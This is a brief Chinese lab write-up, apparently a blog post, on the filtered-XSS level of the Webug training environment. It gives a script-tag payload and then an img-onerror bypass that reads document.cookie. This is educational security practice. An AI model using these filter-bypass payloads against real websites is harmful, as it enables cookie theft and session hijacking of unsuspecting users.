Webug——过滤xss
同反射型xss相同 在url 参数id中进行xss攻击
http://192.168.75.146/control/xss/filter_xss.php?id=<script>alert(xss)</script>
不过根据反馈 script被过滤了
我们就需要绕过 过滤函数
换一个标签
payload=http://192.168.75.146/control/xss/filter_xss.php?id=<img src=1 onerror=alert(document.cookie)>
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】博客园社区专享云产品让利特惠,阿里云新客6.5折上折
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· DeepSeek “源神”启动!「GitHub 热点速览」
· 微软正式发布.NET 10 Preview 1:开启下一代开发框架新篇章
· 我与微信审核的“相爱相杀”看个人小程序副业
· C# 集成 DeepSeek 模型实现 AI 私有化(本地部署与 API 调用教程)
· spring官宣接入deepseek,真的太香了~